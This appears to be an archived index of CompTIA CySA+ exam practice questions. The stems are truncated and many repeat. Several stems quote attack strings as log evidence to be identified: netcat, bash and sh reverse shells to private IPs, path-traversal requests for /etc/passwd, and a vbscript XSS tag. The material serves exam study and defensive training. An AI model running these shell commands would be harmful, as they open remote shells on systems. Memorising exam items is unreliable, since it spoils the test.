أرشيف أسئلة الاختبار
اختبار شهادة محلل الأمن السيبراني CompTIA CySA+
هذه الصفحة مخصصة للأرشفة وتعرض جميع أسئلة الاختبار وروابط كل سؤال مع الخيارات والنقاشات.
تنبيه مهم
هذه الصفحة للأرشفة فقط. إذا كنت تريد التجربة الحقيقية للاختبار والدخول إلى واجهة الاختبار الأصلية فانتقل إلى صفحة الاختبار من الرابط التالي.
الانتقال إلى صفحة الاختبار الفعلية
الأسئلة
1040 سؤال- A Chief Information Security Officer wants to implement security by design, starting with the implementation of a security scanning method to identify vulnerabi ...
- An analyst is reviewing system logs while threat hunting Which of the following hosts should be investigated first?
- Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastruct ...
- A cybersecurity analyst is participating with the DLP project team to classify the organization's data. Which of the following is the primary purpose for clas ...
- Before adopting a disaster recovery plan, some team members need to gather in a room to review the written scenarios. Which of the following best describes what ...
- A regulated organization experienced a security breach that exposed a list of customer names with corresponding PII data. Which of the following is the best re ...
- When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID 1024), a Sysinternals tool used to create desktop back ...
- Based on an internal assessment, a vulnerability management team wants to proactively identify risks to the infrastructure prior to production deployments. Whic ...
- During onboarding, a new cybersecurity analyst is reviewing a security document that states the following: Security logs must be maintained in a format that a ...
- A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes ...
- A SOC analyst determined that a significant number of the reported alarms could be closed after removing the duplicates. Which of the following could help the ...
- An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utili ...
- Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?
- Joe, a leading salesperson at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with ...
- A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Wh ...
- An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Whic ...
- A security analyst has found a moderate-risk item in an organization's point-of-sale application. The organization is currently in a change freeze window and ...
- A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environm ...
- The vulnerability analyst reviews threat intelligence regarding emerging vulnerabilities affecting workstations that are used within the company. Which of the ...
- A cybersecurity analyst is recording the following details: • ID • Name • Description • Classification of information • Responsible party In which of ...
- Due to an incident involving company devices, an incident responder needs to take a mobile phone to the lab for further investigation. Which of the following ...
- Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the g ...
- Which of the following is a commonly used four-component framework to communicate threat actor behavior?
- Two employees in the finance department installed a freeware application that contained embedded malware. The network is robustly segmented based on areas of ...
- A company has decided to expose several systems to the internet, the systems are currently available internally only. A security analyst is using a subset of C ...
- Due to an incident involving company devices, an incident responder needs to take a mobile phone to the lab for further investigation. Which of the following ...
- A cybersecurity analyst is participating with the DLP project team to classify the organization's data. Which of the following is the primary purpose for clas ...
- When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID 1024), a Sysinternals tool used to create desktop back ...
- During onboarding, a new cybersecurity analyst is reviewing a security document that states the following: Security logs must be maintained in a format that a ...
- A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes ...
- A SOC analyst determined that a significant number of the reported alarms could be closed after removing the duplicates. Which of the following could help the ...
- An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utili ...
- Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?
- Joe, a leading salesperson at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with ...
- A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Wh ...
- An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Wh ...
- A security analyst has found a moderate-risk item in an organization's point-of-sale application. The organization is currently in a change freeze window and ...
- A vulnerability analyst is writing a report documenting the newest, most critical vulnerabilities identified in the past month. Which of the following public ...
- Due to an incident involving company devices, an incident responder needs to take a mobile phone to the lab for further investigation. Which of the following ...
- Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the g ...
- Which of the following is a commonly used four-component framework to communicate threat actor behavior?
- Two employees in the finance department installed a freeware application that contained embedded malware. The network is robustly segmented based on areas of ...
- A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project: Which of the following vulnerability scannin ...
- An analyst is designing a message system for a bank. The analyst wants to include a feature that allows the recipient of a message to prove to a third party t ...
- After an incident, a security analyst needs to perform a forensic analysis to report complete information to a company stakeholder. Which of the following is ...
- An organization receives a legal hold request from an attorney. The request pertains to emails related to a disputed vendor contract. Which of the following i ...
- A security analyst has identified a new malware file that has impacted the organization. The malware is polymorphic and has built-in conditional triggers that ...
- A security team needs to demonstrate how prepared the team is in the event of a cyberattack. Which of the following would best demonstrate a real-world incide ...
- An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server ...
- A threat hunter seeks to identify new persistence mechanisms installed in an organization's environment. In collecting scheduled tasks from all enterprise wor ...
- While reviewing the web server logs, a security analyst notices the following snippet: ..\..\..\boot.ini Which of the following is being attempted?
- Which of the following is the best reason to implement an MOU?
- An organization's security operations team has been experiencing issues with fake news events about potential cyberattacks that could impact the organization' ...
- A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which of the following best explains how the analys ...
- A security analyst reviews the following results of a Nikto scan: Which of the following should the security administrator investigate next?
- An organization is conducting a pilot deployment of an e-commerce application. The application's source code is not available. Which of the following strategi ...
- Which of the following evidence collection methods is most likely to be acceptable in court cases?
- Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?
- An analyst is suddenly unable to enrich data from the firewall. However, the other open intelligence feeds continue to work. Which of the following is the mos ...
- Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?
- Which of the following is the primary purpose for classifying data?
- Which of the following is the best reason for developing the organization's communication plans?
- Which of the following is the most likely scenario occurring with the time stamps?
- Which of the following could help the analyst reduce the number of alarms with the least effort?
- An end-of-life date was announced for a widely used 0S. A business-critical function is performed by some machinery that is controlled by a PC, which is util ...
- Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?
- A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Wh ...
- A security analyst has found a moderate-risk item in an organization's point-of-sale application. The organization is currently in a change freeze window and ...
- Which of the following tools should be used to maintain the integrity of the mobile phone while it is transported?
- Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the g ...
- Which of the following is a commonly used four-component framework to communicate threat actor behavior?
- An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Whi ...
- A security analyst wants to implement new monitoring controls in order to find abnormal account activity for traveling employees. Which of the following techn ...
- A security analyst detected the following suspicious activity: bash Copy code rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > /tm ...
- A cybersecurity analyst is participating with the DLP project team to classify the organization's data. Which of the following is the primary purpose for clas ...
- A regulated organization experienced a security breach that exposed a list of customer names with corresponding PII data. Which of the following is the best re ...
- When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID 1024), a Sysinternals tool used to create desktop back ...
- During onboarding, a new cybersecurity analyst is reviewing a security document that states the following: Security logs must be maintained in a format that a ...
- A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes ...
- Which of the following could help the analyst reduce the number of alarms with the least effort?
- Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?
- Joe, a leading salesperson at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with ...
- A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Wh ...
- A security analyst has found a moderate-risk item in an organization's point-of-sale application. The organization is currently in a change freeze window and ...
- A cybersecurity analyst is recording the following details: • ID • Name • Description • Classification of information • Responsible party In which of the ...
- A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project: • Must use minimal network bandwidth • Mu ...
- Which of the following vulnerability scanning methods should be used to best meet these requirements?
- Which of the following tools should be used to maintain the integrity of the mobile phone while it is transported?
- A system that provides the user interface for a critical server has potentially been corrupted by malware. Which of the following is the best recommendation t ...
- A security team needs to demonstrate how prepared the team is in the event of a cyberattack. Which of the following would best demonstrate a real-world incide ...
- During a tabletop exercise, engineers discovered that an ICS could not be updated due to hardware versioning incompatibility. Which of the following is the mo ...
- An analyst finds that an IP address outside of the company network that is being used to run network and vulnerability scans across external-facing assets. Wh ...
- Which of the following techniques can help a SOC team to reduce the number of alerts related to the internal security activities that the analysts have to tri ...
- A security administrator has found indications of dictionary attacks against the company's external-facing portal. Which of the following should be implemented ...
- A cybersecurity analyst is recording the following details: • ID • Name • Description • Classification of information • Responsible party In which of the ...
- A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The pr ...
- A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which o ...
- An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from t ...
- An analyst receives an alert from the EDR indicating a user has downloaded a malicious file that is attempting to compromise the laptop. The analyst gathers t ...
- The vulnerability analyst reviews threat intelligence regarding emerging vulnerabilities affecting workstations that are used within the company: Vulnerabili ...
- A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the enviro ...
- Based on an internal assessment, a vulnerability management team wants to proactively identify risks to the infrastructure prior to production deployments. Wh ...
- Before adopting a disaster recovery plan, some team members need to gather in a room to review the written scenarios. Which of the following best describes wh ...
- Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastru ...
- A Chief Information Security Officer wants to implement security by design, starting with the implementation of a security scanning method to identify vulnera ...
- A security analyst is implementing a process to perform vulnerability management on an OT environment: Systems must remain on an isolated network. The process ...
- Which of the following is the most important reason for an incident response team to develop a formal incident declaration?
- Which of the following responsibilities does the legal team have during an incident management event? (Select two).
- Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure that it will not be detected b ...
- To comply with regulatory requirements, the Chief Executive Officer (CEO) must lead the company through simulations to find which steps are missing in emergency ...
- A security analyst is assessing the security of a cloud environment. The following output is generated when the assessment runs: Authentication error Instan ...
- When undertaking a cloud migration of multiple SaaS applications, an organization’s systems administrators struggled with the complexity of extending identity a ...
- A vulnerability scan of a web server that is exposed to the internet was recently completed. A security analyst is reviewing the resulting vector strings: Wh ...
- The architecture team has been given a mandate to reduce the triage time of phishing incidents by 20%. Which of the following solutions will most likely help wi ...
- A SOC analyst is analyzing traffic on a network and notices an unauthorized scan. Which of the following types of activities is being observed?
- An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with ...
- A company classifies security groups by risk level. Any group with a high-risk classification requires multiple levels of approval for member or owner changes. ...
- The SOC received a threat intelligence notification indicating that an employee’s credentials were found on the dark web. The user’s web and login activities we ...
- Which of the following best describes the reporting metric that should be utilized when measuring the degree to which a system, application, or user base is aff ...
- Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the followin ...
- Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the followin ...
- Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?
- During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would be ...
- A Chief Information Security Officer wants to map all of the attack vectors that the company faces each day. Which of the following recommendations should the c ...
- A Chief Information Security Officer wants to map all of the attack vectors that the company faces each day. Which of the following recommendations should the c ...
- A security analyst must assist the IT department with creating a phased plan for vulnerability patching that meets established SLAs. Which of the following vuln ...
- A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a termin ...
- Law enforcement subpoenas a company in order to obtain all records related to the activities a threat actor performed using the IP address 154.21.154.21. Which ...
- Which of the following risk management decisions should be considered after evaluating all other options?
- A user clicks on a malicious adware link, and the malware successfully downloads to the machine. The malware has a script that invokes command-and-control activ ...
- A security analyst is investigating an unusually high volume of requests received on a web server. Based on the following command and output: Which of the fo ...
- Which of the following is a nation-state actor least likely to be concerned with?
- When undertaking a cloud migration of multiple SaaS applications ، an organization’s systems administrators struggled with the complexity of extending identity ...
- A company’s security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptomi ...
- Using open-source intelligence gathered from technical forum a threat actor compiles and tests a malicious downloader to ensure that it will not be detected by ...
- An organization’s Chief Information Security Officer (CISO) is organizing a tabletop drill. The CISO has included several other executives in the meeting invita ...
- Which of the following is the best reason to implement an MOU?
- Which of the following is a circumstance in which a security operations manager would most likely consider using automation?
- Security analysts can review the Windows Registry on endpoints to get insights into:
- A security analyst is reviewing the logs after getting an alert. At which of the following stages of the incident response process should the analyst establish ...
- Which of the following best explains the importance of communicating unusual alert findings?
- The website of a large retail chain is failing to enforce encrypted HTTPS connections, leaving customer account credentials exposed. Which of the following is t ...
- A company wants to implement protection mechanisms after an incident in which customer information was sent to a third party. Which of the following tools shoul ...
- The security team is reviewing a list of vulnerabilities present on the environment, and they want to prioritize the remediation based on the CVSS v4.0 metrics: ...
- An organization wants to establish a disaster recovery plan for critical applications that are hosted on premises. Which of the following is the first step to p ...
- A cybersecurity analyst is helping systems engineers investigate a Windows server that experienced a sudden reduction in available drive space. The analyst revi ...
- Which of the following is instituting a security policy that users must lock their systems when stepping away from their desks an example of?
- An analyst reviews the following web server log entries: %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd No attacks or malicious attempts have been disco ...
- A company reports that user plain text credentials have been disclosed from their network. A security analyst is identifying the vulnerability and runs a scan t ...
- After a series of UEBA alerts, a company’s SOC observes an extended period of suspicious outbound traffic all with the same destination. Which of the following ...
- Which of the following is the appropriate phase in the incident response process to perform a vulnerability scan to determine the effectiveness of corrective ac ...
- A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Whic ...
- A web developer reports the following error that appeared on a development server when testing a new application: Which of the following tools can be used to ...
- A user forwards an email with an attachment to the SOC asking if it is safe to open. Which of the following tasks should a SOC analyst perform? (Select two)
- An analyst is imaging a hard drive that was obtained from the system of an employee who is suspected of going rogue. The analyst notes that the initial hash of ...
- Which of the following is the best strategy for prioritizing vulnerabilities for remediation?
- A threat intelligence analyst needs to gather TTPs from attackers. Which of the following is the most comprehensive resource for this task?
- A security analyst needs to provide evidence of regular vulnerability scanning on the company's network for an auditing process. Which of the following is an ex ...
- A security analyst is working on a suspicious email forwarded from a user. The email contains an attachment asking the user to open it. Which of the following s ...
- A security administrator needs to import PII data records from the production environment to the test environment for testing purposes. Which of the following w ...
- A SOC has SIEM configured to receive threat intelligence feeds from multiple external sources. For certain tasks, there is no need for human interaction. Which ...
- A security analyst receives the following information about the company's systems. They need to prioritize which systems should be given the resources to improv ...
- A security analyst discovers multiple log entries from a recently acquired tool that was bundled as a YUM package. Those entries point to attempts of privilege ...
- An incident responder is investigating a possible server data exfiltration incident with the intent to prosecute if necessary. The responder: Captures live mem ...
- A security analyst is comparing the results of the past and current active credentialed vulnerability scans: Which of the following should the analyst do nex ...
- A vulnerability analyst is writing a report documenting the newest, most critical exposure risks identified in the past month. Which of the following public MIT ...
- Which of the following is the most likely reason for an organization to assign different internal departmental groups during the post-incident analysis and impr ...
- An analyst is conducting routine vulnerability assessments on the company infrastructure. When performing these scans, a business-critical server crashes, and t ...
- Joe, a leading salesperson at an organization, has announced on social media that they are leaving their current role to start a new company that will compete w ...
- Which of the following entities should an incident manager work with to ensure that correct processes are adhered to when communicating incident reporting to th ...
- A security analyst receives the following information about the company’s systems. They need to prioritize which systems should be given the resources to improv ...
- A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which of the following best explains how the analyst ...
- The DevSecOps team is remediating an SSRF issue on the company’s public-facing website. Which of the following is the best mitigation technique to address this ...
- Which of the following best explains the reason system hardening is essential for servers?
- A security analyst is analyzing two vulnerabilities on a critical router. The analyst must choose only one to patch during this maintenance window. Given the fo ...
- A security analyst is analyzing two vulnerabilities on a critical router. The analyst must choose only one to patch during this maintenance window. Given the fo ...
- A recent penetration test discovered that several employees were enticed to assist attackers by visiting specific websites and running downloaded files when pro ...
- Executives at an organization email sensitive financial information to external business partners when negotiating valuable contracts. To ensure the legal valid ...
- An incident responder is investigating a possible server data exfiltration incident with the intent to prosecute if necessary. The responder: Captures live mem ...
- A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. ...
- An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the foll ...
- A critical server hosting final exams for an educational institution fails while students are taking their exams. The final exam deadline is in 16 hours. Which ...
- While performing a dynamic analysis of a malicious file, a security analyst notices that the memory address changes every time the process runs. Which of the fo ...
- Which of the following best describes root cause analysis?
- A security team needs to demonstrate how prepared the team is in the event of a cyberattack. Which of the following would best demonstrate a real-world incident ...
- A security analyst is scanning an ICS host (192.168.1.5) in an industrial plant for insecure ports while minimizing the impact to uptime or performance. Which o ...
- Which of the following best explains the importance of playbooks for incident response teams?
- Which of the following is the best option for an IT administrator to deploy to ensure standardized permissions to a cloud environment?
- After a recent vulnerability report for a server is presented, a business must decide whether to secure the company’s web-based storefront or shut it down. The ...
- Which of the following most accurately describes the Cyber Kill Chain methodology?
- Which of the following best describes the benefit of implementing a PAM solution?
- A security analyst is handling vulnerability management tasks and reviewing the following output from Recon-ng's Shodan-IP module. Which of the following are th ...
- Which of the following uses simulated traffic to a website to evaluate performance?
- Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?
- Several incidents have occurred with a legacy web application that has had little development work completed. Which of the following is the most likely cause of ...
- Which of the following best describes the process of requiring remediation of a known threat within a given time frame?
- Which of the following statements best describes the MITRE ATT&CK framework?
- A penetration tester crashes a web application by entering a 15-digit value in the postal code field on the user registration form. Which of the following contr ...
- A red team engineer discovers that analyzing multiple pieces of less sensitive public information results in knowledge of a sensitive piece of confidential info ...
- A security analyst is assessing the security of a cloud environment. The following output is generated when the assessment runs: Authentication error Instan ...
- A security analyst finds that two file servers generated alerts about shadow copies that were deleted by a script that was run from a temporary directory and de ...
- A security analyst identifies a device on which different malware was detected multiple times even after the systems were scanned and cleaned several times. Whi ...
- Which of the following is a reason why a SOC team member might spend extra time on a routine incident prior to closing it?
- A company suspects a coordinated effort to attack their platform. Web server logs show malicious activity from many different source IP addresses located in dif ...
- A security analyst is performing a malware analysis on a device and receives the following instructions: Reduce the blast radius of the potential threat. Pres ...
- A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The sec ...
- A DevOps analyst implements a webhook to trigger code vulnerability scanning for submissions to the repository. Which of the following is the primary benefit of ...
- During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would be ...
- During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner, and ...
- The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its ...
- Which of the following best explains the importance of communicating unusual alert findings?
- A Chief Information Security Officer wants to lock down the users' ability to change applications that are installed on their Windows systems. Which of the foll ...
- A security analyst is identifying vulnerabilities in laptops. Users often take their laptops out of the office while traveling, and the vulnerability scan metri ...
- A Chief Information Security Officer (CISO) has decided the cost to protect an asset is greater than the cost of losing the asset. Which of the following risk m ...
- A SOC manager is looking for a solution that can improve the response time and execute predetermined instructions. Which of the following is the best solution b ...
- Which of the following features is a key component of Zero Trust architecture?
- Which of the following best explains the importance of effective customer communication during a data breach?
- A threat intelligence analyst detects the following: Abuse elevation control mechanism Bypass user access control To which of the following components of a M ...
- While reviewing the web server logs, a security analyst notices the following snippet: ..\..\..\boot.ini Which of the following is being attempted?
- An organization discovers unauthorized outbound network connections from a local, internal server to a remote server. A systems administrator compares the hash ...
- An organization has tracked several incidents that are listed in the following table. Which of the following is the organization’s MTTD?
- A security analyst receives the following information about the company’s systems. They need to prioritize which systems should be given the resources to improv ...
- A company recently removed administrator rights from all of its end user workstations. An analyst uses CVSSv3.1 exploitability metrics to prioritize the vulnera ...
- A security analyst is prioritizing vulnerabilities that were identified in a recent scan of the company’s systems. Given the following data: Which of the follo ...
- A threat hunter seeks to identify new persistence mechanisms installed in an organization’s environment. In collecting scheduled tasks from all enterprise works ...
- An XSS vulnerability was reported on one of the public websites of a company. The security department confirmed the finding and needs to provide a recommendatio ...
- A security analyst is reviewing the logs of a web server and notices that an attacker has attempted to exploit a SQL injection vulnerability. Which of the follo ...
- The Chief Executive Officer (CEO) has notified that a confidential trade secret has been compromised. Which of the following communication plans should the CEO ...
- A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of ...
- A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data ...
- A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that embeds software through the USB interface. Which of the f ...
- Following a recent security incident, the Chief Information Security Officer is concerned with improving visibility and reporting of malicious actors in the env ...
- During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed ...
- After completing a review of network activity, the threat hunting team discovers a device on the network that sends an outbound email via a mail client to a non ...
- Which of the following would likely be used to update a dashboard that integrates data from multiple sources in real time?
- An analyst receives an alert for suspicious IIS log activity and reviews the following entries: '2024-05-23 15:57:05 10.203.10.16 HEAT / - 80 - 10.203.10.17 Dir ...
- A security analyst received an alert regarding multiple successful MFA log-ins for a particular user. When reviewing the authentication logs, the analyst sees u ...
- Which of the following will most likely cause severe issues with authentication and logging?
- During an incident, a security analyst discovers a large amount of PII has been emailed externally from an employee to a public email address. The analyst finds ...
- The Chief Information Security Officer for an organization recently received approval to install a new EDR solution. Following the installation, the number of a ...
- A report contains IoC and TTP information for a zero-day exploit that leverages vulnerabilities in a specific version of a web application. Which of the followi ...
- Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?
- An analyst is conducting monitoring against an authorized team that will perform adversarial techniques. The analyst interacts with the team twice per day to se ...
- A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the mos ...
- Which of the following best explains the importance of network microsegmentation as part of a Zero Trust architecture?
- A security administrator has found indications of dictionary attacks against the company's external-facing portal. Which of the following should be implemented ...
- A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connec ...
- A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connec ...
- An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from the ...
- An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has: • created the initial evidence ...
- While reviewing the web server logs, a security analyst notices the following snippet: ..\..\..\boot.ini Which of the following is being attempted?
- A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. ...
- An organization identifies a method to detect unexpected behavior, crashes, or resource leaks in a system by feeding invalid, unexpected, or random data to stre ...
- A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Whic ...
- When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID 1024), a Sysinternals tool used to create desktop backgr ...
- A company has a primary control in place to restrict access to a sensitive database. However, the company discovered an authentication vulnerability that could ...
- An incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed U ...
- Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known source ...
- A manufacturer has hired a third-party consultant to assess the security of an OT network that includes both fragile and legacy equipment. Which of the followin ...
- An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which ...
- A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project: - Must use minimal network bandwidth - Must use ...
- A vulnerability scan shows the following issues: - Workstations: CVSS Score 6.5, RDP vulnerability - Storage Server: CVSS Score 9.0, Unauthorized access due to ...
- A security analyst reviews a packet capture and identifies the following output as anomalous: ``` 13:49:57.553161 IP 10.203.10.17.45701 > 10.203.10.22.12930: Fl ...
- A company's internet-facing web application has been compromised several times due to identified design flaws. The company would like to minimize the risk of th ...
- Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?
- Which of the following would help to minimize human engagement and aid in process improvement in security operations?
- A security analyst observed the following activity from a privileged account: - Accessing emails and sensitive information - Audit logs being modified - Abnorma ...
- Which of the following documents sets requirements and metrics for a third-party response during an event?
- Which of the following is a KPI that is used to monitor or report on the effectiveness of an incident response reporting and communication program?
- During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner, and ...
- An organization is planning to adopt a zero-trust architecture. Which of the following is most aligned with this approach?
- A Chief Information Security Officer (CISO) is concerned that a specific threat actor who is known to target the company's business type may be able to breach t ...
- A security team identified several rogue Wi-Fi access points during the most recent network scan. The network scans occur once per quarter. Which of the followi ...
- An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizi ...
- Which of the following explains the importance of a timeline when providing an incident response report?
- An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the followin ...
- Which of the following best explains the importance of the implementation of a secure software development life cycle in a company with an internal development ...
- Which of the following best explains the importance of the implementation of a secure software development life cycle in a company with an internal development ...
- Which of the following threat actors is most likely to target a company due to its questionable environmental policies?
- A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The c ...
- An incident response analyst is taking over an investigation from another analyst. The investigation has been going on for the past few days. Which of the follo ...
- An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best descr ...
- A systems administrator notices unfamiliar directory names on a production server. The administrator reviews the directory listings and files, and then conclude ...
- The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best a ...
- A network security analyst for a large company noticed unusual network activity on a critical system. Which of the following tools should the analyst use to ana ...
- An organization has a critical financial application hosted online that does not allow event logging to send to the corporate SIEM. Which of the following is th ...
- An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of the following is most likely the issue with the sy ...
- A company is in the process of implementing a vulnerability management program. Which of the following scanning methods should be implemented to minimize the ri ...
- A regulated organization experienced a security breach that exposed a list of customer names with corresponding PII data. Which of the following is the best re ...
- During a scan of a web server in the perimeter network, a vulnerability was identified that could be exploited over port 3389. The web server is protected by a ...
- A security analyst identifies a device on which different malware was detected multiple times, even after the systems were scanned and cleaned several times. Wh ...
- During normal security monitoring activities, the following activity was observed: cd C:\Users\Documents\HR\Employees takeown /f .* SUCCESS: Which of the follow ...
- A security analyst identified the following suspicious entry on the host-based IDS logs: bash -i >& /dev/tcp/10.1.2.3/8080 0>&1 Which of the following shell scr ...
- A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the ...
- A SOC analyst is analyzing traffic on a network and notices an unauthorized scan. Which of the following types of activities is being observed?
- Which of the following is described as a method of enforcing a security policy between cloud customers and cloud services?
- A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago but the report did not have a follow-up r ...
- An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the ...
- The architecture team has been given a mandate to reduce the triage time of phishing incidents by 20%. Which of the following solutions will most likely help wi ...
- An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the f ...
- Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?
- While reviewing web server logs, a security analyst found the following line: < IMG SRC=' vbscript : msgbox("test")' > Which of the following malicious ...
- An attacker recently gained unauthorized access to a financial institution's database, which contains confidential information. The attacker exfiltrated a large ...
- A security analyst noticed the following entry on a web server log: Warning: fopen (ht tp://127.0.0.1:16) : failed to open stream: Connection refused in /hj/var ...
- A penetration tester is conducting a test on an organization's software development website. The penetration tester sends the following request to the web inter ...
- A cybersecurity analyst is recording the following details: * ID * Name * Description * Classification of information * Responsible party In which of the follow ...
- In the last hour, a high volume of failed RDP authentication attempts has been logged on a critical server. All of the authentication attempts originated from t ...
- Which of the following should be updated after a lessons-learned review?
- A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and whether there are URIs that should be denied access p ...
- A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is th ...
- An incident response analyst is investigating the root cause of a recent malware outbreak. Initial binary analysis indicates that this malware disables host sec ...
- An organization was compromised, and the usernames and passwords of all employees were leaked online. Which of the following best describes the remediation that ...
- Results of a SOC customer service evaluation indicate high levels of dissatisfaction with the inconsistent services provided after regular work hours. To addres ...
- A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. ...
- Which of the following best describes the key elements of a successful information security program?
- Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?
- A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$1 Which of the following is being attempted?
- A Chief Information Security Officer (CISO) wants to disable a functionality on a business-critical web application that is vulnerable to RCE in order to mainta ...
- A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attac ...
- A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the ...
- Several reports with sensitive information are being disclosed via file sharing services. The company would like to improve its security posture against this th ...
- A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and ...
- A security analyst detected the following suspicious activity: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f Which of the foll ...
